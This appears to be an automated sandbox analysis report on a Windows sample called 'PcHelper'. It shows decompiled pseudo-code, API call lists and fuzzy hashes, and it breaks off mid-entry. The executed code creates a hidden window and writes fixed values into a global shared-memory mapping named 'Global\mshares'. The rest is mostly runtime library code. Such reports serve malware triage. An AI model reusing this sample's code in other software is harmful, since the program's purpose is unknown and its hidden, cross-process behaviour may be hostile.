    0x010711f8
    0x010711fe
    0x010711fe
    0x0107120c
    0x01071210
    0x01071223
    0x0107117a
    0x01071187
    0x01071187

    APIs
    • LoadStringW.USER32(?,00000067,PcHelper,00000064), ref: 010710C5
    • LoadStringW.USER32(?,0000006D,PCHELPER,00000064), ref: 010710D1
    • LoadIconW.USER32(?,0000006B), ref: 01071102
    • LoadCursorW.USER32(00000000,00007F00), ref: 0107110E
    • LoadIconW.USER32(?,0000006C), ref: 01071131
    • RegisterClassExW.USER32 ref: 0107113A
    • CreateWindowExW.USER32 ref: 0107116C
    • ShowWindow.USER32(00000000,00000000), ref: 0107118D
    • UpdateWindow.USER32(00000000), ref: 01071194
    • LoadAcceleratorsW.USER32 ref: 0107119D
    • CreateThread.KERNELBASE ref: 010711B5
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010711CB
    • TranslateAcceleratorW.USER32(?,?,?), ref: 010711EA
    • TranslateMessage.USER32(?), ref: 010711F8
    • DispatchMessageW.USER32 ref: 010711FE
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0107120A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Load$Message$Window$CreateIconStringTranslate$AcceleratorAcceleratorsClassCursorDispatchRegisterShowThreadUpdate
    • String ID: 0$PCHELPER$PcHelper$m$@Cw
    • API String ID: 3299975972-1813121543
    • Opcode ID: e56bc0e6c8b9d029cd2df88e92977491c26df8baf4c20482da4d9ea82b656fbb
    • Instruction ID: 3fcfdf95af34a218d2b1d8a55adc1f09d354f1ec7775490727295d0d9900593f
    • Opcode Fuzzy Hash: e56bc0e6c8b9d029cd2df88e92977491c26df8baf4c20482da4d9ea82b656fbb
    • Instruction Fuzzy Hash: B2411371E40318BBDB219BD5EC45FAE7BB8AF48B11F100019F641BB1C4DBBA6515CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E01071C8F() {
    				_Unknown_base(*)()* _t1;
    
    				_t1 = SetUnhandledExceptionFilter(E01071C9B); // executed
    				return _t1;
    			}




    0x01071c94
    0x01071c9a

    APIs
    • SetUnhandledExceptionFilter.KERNELBASE(Function_00001C9B,01071842), ref: 01071C94
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: 39c59a7231928cc5c031f8156b748873bf3db3e3381386536720ce87d6e09f98
    • Instruction ID: 11ef369349c90dcf09c512e6027b7bfb4a96d71c611c0b61671597c533466804
    • Opcode Fuzzy Hash: 39c59a7231928cc5c031f8156b748873bf3db3e3381386536720ce87d6e09f98
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0107149B(_Unknown_base(*)()* __edi, void* __esi) {
    				struct HINSTANCE__* _t2;
    				void* _t4;
    				void* _t7;
    				void* _t10;
    				struct HINSTANCE__* _t14;
    
    				_t11 = __edi;
    				_push(__edi);
    				InitializeCriticalSectionAndSpinCount(0x10838d4, 0xfa0);
    				_t2 = GetModuleHandleW(L"api-ms-win-core-synch-l1-2-0.dll"); // executed
    				_t14 = _t2;
    				if(_t14 != 0) {
    					L2:
    					_t11 = GetProcAddress(_t14, "SleepConditionVariableCS");
    					_t4 = GetProcAddress(_t14, "WakeAllConditionVariable");
    					if(_t11 == 0 || _t4 == 0) {
    						_t4 = CreateEventW(0, 1, 0, 0);
    						 *0x10838d0 = _t4;
    						if(_t4 != 0) {
    							goto L5;
    						} else {
    							goto L7;
    						}
    					} else {
    						 *0x10838ec = _t11;
    						 *0x10838f0 = _t4;
    						L5:
    						return _t4;
    					}
    				} else {
    					_t14 = GetModuleHandleW(L"kernel32.dll");
    					if(_t14 == 0) {
    						L7:
    						E01071AF9(_t10, _t11, _t14, 7);
    						asm("int3");
    						DeleteCriticalSection(0x10838d4);
    						_t7 =  *0x10838d0; // 0x0
    						if(_t7 != 0) {
    							return CloseHandle(_t7);
    						}
    						return _t7;
    					} else {
    						goto L2;
    					}
    				}
    			}








    0x0107149b
    0x0107149c
    0x010714a7
    0x010714b2
    0x010714b8
    0x010714bc
    0x010714cf
    0x010714e1
    0x010714e3
    0x010714eb
    0x01071506
    0x0107150c
    0x01071513
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x010714f1
    0x010714f1
    0x010714f7
    0x010714fc
    0x010714fe
    0x010714fe
    0x010714be
    0x010714c9
    0x010714cd
    0x01071515
    0x01071517
    0x0107151c
    0x01071522
    0x01071528
    0x0107152f
    0x00000000
    0x01071532
    0x01071538
    0x00000000
    0x00000000
    0x00000000
    0x010714cd

    APIs
    • InitializeCriticalSectionAndSpinCount.KERNEL32(010838D4,00000FA0,?,?,01071479), ref: 010714A7
    • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,01071479), ref: 010714B2
    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,01071479), ref: 010714C3
    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 010714D5
    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 010714E3
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,01071479), ref: 01071506
    • ___scrt_fastfail.LIBCMT ref: 01071517
    • DeleteCriticalSection.KERNEL32(010838D4,00000007,?,?,01071479), ref: 01071522
    • CloseHandle.KERNEL32(00000000,?,?,01071479), ref: 01071532
    Strings
    • kernel32.dll, xrefs: 010714BE
    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 010714AD
    • SleepConditionVariableCS, xrefs: 010714CF
    • WakeAllConditionVariable, xrefs: 010714DB
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
    • API String ID: 3578986977-3242537097
    • Opcode ID: 713e00bd7229ec6e6a5665fc4b43facb8352b6ba7f8ebaa6e54365dbc2eeadff
    • Instruction ID: 8a9dee5104325aa10e60f812032d44ca430debfb4d48aef2698f20b56241541d
    • Opcode Fuzzy Hash: 713e00bd7229ec6e6a5665fc4b43facb8352b6ba7f8ebaa6e54365dbc2eeadff
    • Instruction Fuzzy Hash: 23015271E54311EBDB322AB96C0DB1A3AE8BF80A917044154B9C5EB288DE79C40397A8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E01071230(struct HWND__* _a4, int _a8, int _a12, long _a16) {
    				signed int _v8;
    				signed int _v12;
    				struct tagPAINTSTRUCT _v76;
    				void* __esi;
    				signed int _t16;
    				void* _t19;
    				void* _t22;
    				void* _t31;
    				int _t43;
    				int _t48;
    				void* _t57;
    				void* _t58;
    				struct HWND__* _t60;
    				void* _t61;
    				void* _t62;
    				void* _t63;
    				void* _t64;
    				void* _t65;
    				void* _t66;
    				signed int _t67;
    
    				_t69 = (_t67 & 0xfffffff8) - 0x4c;
    				_t16 =  *0x108300c; // 0x98fa3f37
    				_v8 = _t16 ^ (_t67 & 0xfffffff8) - 0x0000004c;
    				_t43 = _a8;
    				_t60 = _a4;
    				_t19 = _t43 - 2;
    				if(_t19 == 0) {
    					PostQuitMessage(0);
    					_pop(_t61);
    					return E01071463(_v8 ^ _t69, _t57, _t58, _t61);
    				} else {
    					_t22 = _t19 - 0xd;
    					if(_t22 == 0) {
    						BeginPaint(_t60,  &_v76);
    						EndPaint(_t60,  &_v76);
    						_pop(_t62);
    						return E01071463(_v8 ^ _t69, _t57, _t58, _t62);
    					} else {
    						if(_t22 == 0x102) {
    							_t48 = _a12;
    							_t31 = (_t48 & 0x0000ffff) - 0x68;
    							if(_t31 == 0) {
    								DialogBoxParamW( *0x10845b0, 0x67, _t60, E01071350, 0);
    								_pop(_t63);
    								return E01071463(_v12 ^ _t69, _t57, _t58, _t63);
    							} else {
    								if(_t31 == 1) {
    									DestroyWindow(_t60);
    									_pop(_t64);
    									return E01071463(_v8 ^ _t69, _t57, _t58, _t64);
    								} else {
    									DefWindowProcW(_t60, 0x111, _t48, _a16);
    									_pop(_t65);
    									return E01071463(_v8 ^ _t69, _t57, _t58, _t65);
    								}
    							}
    						} else {
    							DefWindowProcW(_t60, _t43, _a12, _a16); // executed
    							_pop(_t66);
    							return E01071463(_v8 ^ _t69, _t57, _t58, _t66);
    						}
    					}
    				}
    			}























    0x01071236
    0x01071239
    0x01071240
    0x01071244
    0x0107124a
    0x0107124d
    0x01071250
    0x0107132b
    0x01071337
    0x01071342
    0x01071256
    0x01071256
    0x01071259
    0x01071303
    0x0107130f
    0x01071317
    0x01071326
    0x0107125f
    0x01071264
    0x01071286
    0x0107128c
    0x0107128f
    0x010712e3
    0x010712eb
    0x010712fa
    0x01071291
    0x01071294
    0x010712b9
    0x010712c1
    0x010712d0
    0x01071296
    0x010712a0
    0x010712a6
    0x010712b5
    0x010712b5
    0x01071294
    0x01071266
    0x0107126e
    0x01071274
    0x01071283
    0x01071283
    0x01071264
    0x01071259

    APIs
    • DefWindowProcW.USER32(?,?,?,?), ref: 0107126E
    • DefWindowProcW.USER32(?,00000111,?,?), ref: 010712A0
    • BeginPaint.USER32(?,?), ref: 01071303
    • EndPaint.USER32(?,?), ref: 0107130F
    • PostQuitMessage.USER32(00000000), ref: 0107132B
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: PaintProcWindow$BeginMessagePostQuit
    • String ID:
    • API String ID: 3181456275-0
    • Opcode ID: 541541717854aaf85f9c0222e37fd8e03f876c361c5951b2cb6a6861f6862c05
    • Instruction ID: 73bb1e2e99fe70358d5b49ece78373d18580415b029a08a3705c637721279af9
    • Opcode Fuzzy Hash: 541541717854aaf85f9c0222e37fd8e03f876c361c5951b2cb6a6861f6862c05
    • Instruction Fuzzy Hash: CE219871A181096BD714EF78F846AAB7BE8EF4A210F40050AF9C6D61D0DA769420C7D6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E01071020() {
    				void* _t2;
    				void* _t4;
    				void* _t8;
    				void* _t9;
    
    				_t9 = 0;
    				while(1) {
    					L1:
    					Sleep(0x2710); // executed
    					_t2 = OpenFileMappingA(0xf001f, 0, "Global\\mshares"); // executed
    					_t8 = _t2;
    					if(_t8 == 0) {
    						break;
    					}
    					_t9 = _t9 + 1; // executed
    					_t4 = MapViewOfFile(_t8, 6, 0, 0, 0x400); // executed
    					if(_t4 != 0) {
    						 *_t4 = 0x3201f49;
    						 *((intOrPtr*)(_t4 + 4)) = 0x18c1df99;
    						UnmapViewOfFile(_t4);
    						FindCloseChangeNotification(_t8); // executed
    						continue;
    					}
    					L6:
    					return 0;
    				}
    				if(_t9 == 0) {
    					goto L1;
    				} else {
    					_t9 = _t9 + 1;
    					if(_t9 < 0xa) {
    						goto L1;
    					}
    				}
    				goto L6;
    			}







    0x01071029
    0x01071030
    0x01071030
    0x01071035
    0x01071043
    0x01071049
    0x0107104d
    0x00000000
    0x00000000
    0x0107105b
    0x0107105c
    0x01071064
    0x01071067
    0x0107106d
    0x01071074
    0x0107107b
    0x00000000
    0x0107107b
    0x0107108f
    0x01071092
    0x01071092
    0x01071085
    0x00000000
    0x01071087
    0x01071087
    0x0107108b
    0x00000000
    0x00000000
    0x0107108b
    0x00000000

    APIs
    • Sleep.KERNELBASE(00002710), ref: 01071035
    • OpenFileMappingA.KERNEL32 ref: 01071043
    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000400), ref: 0107105C
    • UnmapViewOfFile.KERNEL32(00000000), ref: 01071074
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0107107B
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: File$View$ChangeCloseFindMappingNotificationOpenSleepUnmap
    • String ID: Global\mshares
    • API String ID: 425970157-2130681182
    • Opcode ID: 133c7d5e34b612b18917467937c7d79e376f359efb4cd337267b1c8ed94f87aa
    • Instruction ID: eb02ca631a9a56f19228667381f2cc85e26715e82ba4e641154580c187b82032
    • Opcode Fuzzy Hash: 133c7d5e34b612b18917467937c7d79e376f359efb4cd337267b1c8ed94f87aa
    • Instruction Fuzzy Hash: 86F0F631B40210AFE3326B945C09F2A7AA8BF44B80F111018F7C5BA0C5C6B1C40243E9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E01077299(void* __edi, void* __eflags) {
    				intOrPtr _v12;
    				char _t17;
    				void* _t18;
    				intOrPtr* _t32;
    				char _t35;
    				void* _t37;
    
    				_push(_t27);
    				_t17 = E010754A9(0x40, 0x38); // executed
    				_t35 = _t17;
    				_v12 = _t35;
    				if(_t35 != 0) {
    					_t2 = _t35 + 0xe00; // 0xe00
    					_t18 = _t2;
    					__eflags = _t35 - _t18;
    					if(__eflags != 0) {
    						_t3 = _t35 + 0x20; // 0x20
    						_t32 = _t3;
    						_t37 = _t18;
    						do {
    							_t4 = _t32 - 0x20; // 0x0
    							E010766F9(__eflags, _t4, 0xfa0, 0);
    							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
    							 *_t32 = 0;
    							_t32 = _t32 + 0x38;
    							 *((intOrPtr*)(_t32 - 0x34)) = 0;
    							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
    							 *((char*)(_t32 - 0x2c)) = 0xa;
    							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
    							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
    							 *((char*)(_t32 - 0x26)) = 0;
    							__eflags = _t32 - 0x20 - _t37;
    						} while (__eflags != 0);
    						_t35 = _v12;
    					}
    				} else {
    					_t35 = 0;
    				}
    				E01074D72(0);
    				return _t35;
    			}









    0x0107729f
    0x010772a6
    0x010772ab
    0x010772af
    0x010772b6
    0x010772bc
    0x010772bc
    0x010772c2
    0x010772c4
    0x010772c7
    0x010772c7
    0x010772ca
    0x010772cc
    0x010772d2
    0x010772d6
    0x010772db
    0x010772df
    0x010772e1
    0x010772e4
    0x010772ea
    0x010772f1
    0x010772f5
    0x010772f9
    0x010772fc
    0x010772ff
    0x010772ff
    0x01077303
    0x01077306
    0x010772b8
    0x010772b8
    0x010772b8
    0x01077308
    0x01077313

    APIs
      • Part of subcall function 010754A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0107528C,00000001,00000364,00000005,000000FF,?,0107395D,01078335,?,01077007,?,00000000), ref: 010754EA
    • _free.LIBCMT ref: 01077308
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap_free
    • String ID:
    • API String ID: 614378929-0
    • Opcode ID: f4a7d6c1b0f746b5d238b135762828af42d8407b0a65887c13d701e1e6a95ec1
    • Instruction ID: a4523eaeea8992218232d610e6f0a37dcfa1aa87daa18ed37ea35a12e5dfe39b
    • Opcode Fuzzy Hash: f4a7d6c1b0f746b5d238b135762828af42d8407b0a65887c13d701e1e6a95ec1
    • Instruction Fuzzy Hash: 5A014972A003166BC3228F98D8859DEFBD8EB053B0F00066DE595A76C0E770AC00C7A8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E010754A9(signed int _a4, signed int _a8) {
    				void* _t8;
    				signed int _t13;
    				signed int _t18;
    				long _t19;
    
    				_t18 = _a4;
    				if(_t18 == 0) {
    					L2:
    					_t19 = _t18 * _a8;
    					if(_t19 == 0) {
    						_t19 = _t19 + 1;
    					}
    					while(1) {
    						_t8 = RtlAllocateHeap( *0x10841c8, 8, _t19); // executed
    						if(_t8 != 0) {
    							break;
    						}
    						__eflags = E01074A7A();
    						if(__eflags == 0) {
    							L8:
    							 *((intOrPtr*)(E01073958(__eflags))) = 0xc;
    							__eflags = 0;
    							return 0;
    						}
    						__eflags = E01074AC5(__eflags, _t19);
    						if(__eflags == 0) {
    							goto L8;
    						}
    					}
    					return _t8;
    				}
    				_t13 = 0xffffffe0;
    				if(_t13 / _t18 < _a8) {
    					goto L8;
    				}
    				goto L2;
    			}







    0x010754af
    0x010754b4
    0x010754c2
    0x010754c2
    0x010754c8
    0x010754ca
    0x010754ca
    0x010754e1
    0x010754ea
    0x010754f2
    0x00000000
    0x00000000
    0x010754d2
    0x010754d4
    0x010754f6
    0x010754fb
    0x01075501
    0x00000000
    0x01075501
    0x010754dd
    0x010754df
    0x00000000
    0x00000000
    0x010754df
    0x00000000
    0x010754e1
    0x010754ba
    0x010754c0
    0x00000000
    0x00000000
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0107528C,00000001,00000364,00000005,000000FF,?,0107395D,01078335,?,01077007,?,00000000), ref: 010754EA
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 0555a7838d06913c3aea11065663b07ed67480ca9d4170399b72537c12dc4eaf
    • Instruction ID: d8b20c5e8204009617542e76fd6f2de484505869bc5293b831e52fcd5e6d2017
    • Opcode Fuzzy Hash: 0555a7838d06913c3aea11065663b07ed67480ca9d4170399b72537c12dc4eaf
    • Instruction Fuzzy Hash: C9F0BB31F4513677AB715B29DC00BDB7B98AF517A5B098151ADC8D61C0CE20D40147EC
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 100%
    			E01077A0B(intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _t25;
    				intOrPtr* _t26;
    				intOrPtr _t28;
    				intOrPtr* _t29;
    				intOrPtr* _t31;
    				intOrPtr* _t45;
    				intOrPtr* _t46;
    				intOrPtr* _t47;
    				intOrPtr* _t55;
    				intOrPtr* _t70;
    				intOrPtr _t74;
    
    				_t74 = _a4;
    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
    				if(_t25 != 0 && _t25 != 0x10836f8) {
    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
    					if(_t45 != 0 &&  *_t45 == 0) {
    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
    						if(_t46 != 0 &&  *_t46 == 0) {
    							E01074D72(_t46);
    							E01077528( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
    						if(_t47 != 0 &&  *_t47 == 0) {
    							E01074D72(_t47);
    							E01077626( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						E01074D72( *((intOrPtr*)(_t74 + 0x7c)));
    						E01074D72( *((intOrPtr*)(_t74 + 0x88)));
    					}
    				}
    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
    				if(_t26 != 0 &&  *_t26 == 0) {
    					E01074D72( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
    					E01074D72( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
    					E01074D72( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
    					E01074D72( *((intOrPtr*)(_t74 + 0x8c)));
    				}
    				E01077B7C( *((intOrPtr*)(_t74 + 0x9c)));
    				_t28 = 6;
    				_t55 = _t74 + 0xa0;
    				_v8 = _t28;
    				_t70 = _t74 + 0x28;
    				do {
    					if( *((intOrPtr*)(_t70 - 8)) != 0x1083648) {
    						_t31 =  *_t70;
    						if(_t31 != 0 &&  *_t31 == 0) {
    							E01074D72(_t31);
    							E01074D72( *_t55);
    						}
    						_t28 = _v8;
    					}
    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
    						_t29 =  *((intOrPtr*)(_t70 - 4));
    						if(_t29 != 0 &&  *_t29 == 0) {
    							E01074D72(_t29);
    						}
    						_t28 = _v8;
    					}
    					_t55 = _t55 + 4;
    					_t70 = _t70 + 0x10;
    					_t28 = _t28 - 1;
    					_v8 = _t28;
    				} while (_t28 != 0);
    				return E01074D72(_t74);
    			}















    0x01077a13
    0x01077a17
    0x01077a1f
    0x01077a28
    0x01077a2d
    0x01077a34
    0x01077a3c
    0x01077a44
    0x01077a4f
    0x01077a55
    0x01077a56
    0x01077a5e
    0x01077a66
    0x01077a71
    0x01077a77
    0x01077a7b
    0x01077a86
    0x01077a8c
    0x01077a2d
    0x01077a8d
    0x01077a95
    0x01077aa8
    0x01077abb
    0x01077ac9
    0x01077ad4
    0x01077ad9
    0x01077ae2
    0x01077aea
    0x01077aeb
    0x01077af1
    0x01077af4
    0x01077af7
    0x01077afe
    0x01077b00
    0x01077b04
    0x01077b0c
    0x01077b13
    0x01077b19
    0x01077b1a
    0x01077b1a
    0x01077b21
    0x01077b23
    0x01077b28
    0x01077b30
    0x01077b35
    0x01077b36
    0x01077b36
    0x01077b39
    0x01077b3c
    0x01077b3f
    0x01077b42
    0x01077b42
    0x01077b52

    APIs
    • ___free_lconv_mon.LIBCMT ref: 01077A4F
      • Part of subcall function 01077528: _free.LIBCMT ref: 01077545
      • Part of subcall function 01077528: _free.LIBCMT ref: 01077557
      • Part of subcall function 01077528: _free.LIBCMT ref: 01077569
      • Part of subcall function 01077528: _free.LIBCMT ref: 0107757B
      • Part of subcall function 01077528: _free.LIBCMT ref: 0107758D
      • Part of subcall function 01077528: _free.LIBCMT ref: 0107759F
      • Part of subcall function 01077528: _free.LIBCMT ref: 010775B1
      • Part of subcall function 01077528: _free.LIBCMT ref: 010775C3
      • Part of subcall function 01077528: _free.LIBCMT ref: 010775D5
      • Part of subcall function 01077528: _free.LIBCMT ref: 010775E7
      • Part of subcall function 01077528: _free.LIBCMT ref: 010775F9
      • Part of subcall function 01077528: _free.LIBCMT ref: 0107760B
      • Part of subcall function 01077528: _free.LIBCMT ref: 0107761D
    • _free.LIBCMT ref: 01077A44
      • Part of subcall function 01074D72: HeapFree.KERNEL32(00000000,00000000,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?), ref: 01074D88
      • Part of subcall function 01074D72: GetLastError.KERNEL32(?,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?,?), ref: 01074D9A
    • _free.LIBCMT ref: 01077A66
    • _free.LIBCMT ref: 01077A7B
    • _free.LIBCMT ref: 01077A86
    • _free.LIBCMT ref: 01077AA8
    • _free.LIBCMT ref: 01077ABB
    • _free.LIBCMT ref: 01077AC9
    • _free.LIBCMT ref: 01077AD4
    • _free.LIBCMT ref: 01077B0C
    • _free.LIBCMT ref: 01077B13
    • _free.LIBCMT ref: 01077B30
    • _free.LIBCMT ref: 01077B48
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: 15ec2507e639ef7e8fec78866669fbba27ff7d6bdfa08d2fb19861741e830c4f
    • Instruction ID: e4b3a96a7ad5b1f9c3974c595d9085c89ee05805a74f211f98931963f403c05f
    • Opcode Fuzzy Hash: 15ec2507e639ef7e8fec78866669fbba27ff7d6bdfa08d2fb19861741e830c4f
    • Instruction Fuzzy Hash: 5F314F31E00706AFEB62BA7CD848BA677E8EF50390F508459E2D5D7150EF30ED908B58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E01074FD2(void* __esi, char _a4) {
    				void* _v5;
    				char _v12;
    				char _v16;
    				char _v20;
    				void* __ebp;
    				char _t55;
    				char _t61;
    				intOrPtr _t67;
    				void* _t71;
    
    				_t71 = __esi;
    				_t36 = _a4;
    				_t67 =  *_a4;
    				_t75 = _t67 - 0x107df30;
    				if(_t67 != 0x107df30) {
    					E01074D72(_t67);
    					_t36 = _a4;
    				}
    				E01074D72( *((intOrPtr*)(_t36 + 0x3c)));
    				E01074D72( *((intOrPtr*)(_a4 + 0x30)));
    				E01074D72( *((intOrPtr*)(_a4 + 0x34)));
    				E01074D72( *((intOrPtr*)(_a4 + 0x38)));
    				E01074D72( *((intOrPtr*)(_a4 + 0x28)));
    				E01074D72( *((intOrPtr*)(_a4 + 0x2c)));
    				E01074D72( *((intOrPtr*)(_a4 + 0x40)));
    				E01074D72( *((intOrPtr*)(_a4 + 0x44)));
    				E01074D72( *((intOrPtr*)(_a4 + 0x360)));
    				_v16 =  &_a4;
    				_t55 = 5;
    				_v12 = _t55;
    				_v20 = _t55;
    				_push( &_v12);
    				_push( &_v16);
    				_push( &_v20);
    				E01074DFE(_t75);
    				_v16 =  &_a4;
    				_t61 = 4;
    				_v20 = _t61;
    				_v12 = _t61;
    				_push( &_v20);
    				_push( &_v16);
    				_push( &_v12);
    				return E01074E69(_t71, _t75);
    			}












    0x01074fd2
    0x01074fd7
    0x01074fdd
    0x01074fdf
    0x01074fe5
    0x01074fe8
    0x01074fed
    0x01074ff0
    0x01074ff4
    0x01074fff
    0x0107500a
    0x01075015
    0x01075020
    0x0107502b
    0x01075036
    0x01075041
    0x0107504f
    0x0107505a
    0x01075062
    0x01075063
    0x01075066
    0x0107506c
    0x01075070
    0x01075074
    0x01075075
    0x0107507f
    0x01075085
    0x01075086
    0x01075089
    0x0107508f
    0x01075093
    0x01075097
    0x0107509e

    APIs
    • _free.LIBCMT ref: 01074FE8
      • Part of subcall function 01074D72: HeapFree.KERNEL32(00000000,00000000,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?), ref: 01074D88
      • Part of subcall function 01074D72: GetLastError.KERNEL32(?,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?,?), ref: 01074D9A
    • _free.LIBCMT ref: 01074FF4
    • _free.LIBCMT ref: 01074FFF
    • _free.LIBCMT ref: 0107500A
    • _free.LIBCMT ref: 01075015
    • _free.LIBCMT ref: 01075020
    • _free.LIBCMT ref: 0107502B
    • _free.LIBCMT ref: 01075036
    • _free.LIBCMT ref: 01075041
    • _free.LIBCMT ref: 0107504F
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 3cb0dc65df8302449e1de9be8cf0cfc2fcabe0a3b6cbca0d7a3b93675ec5466c
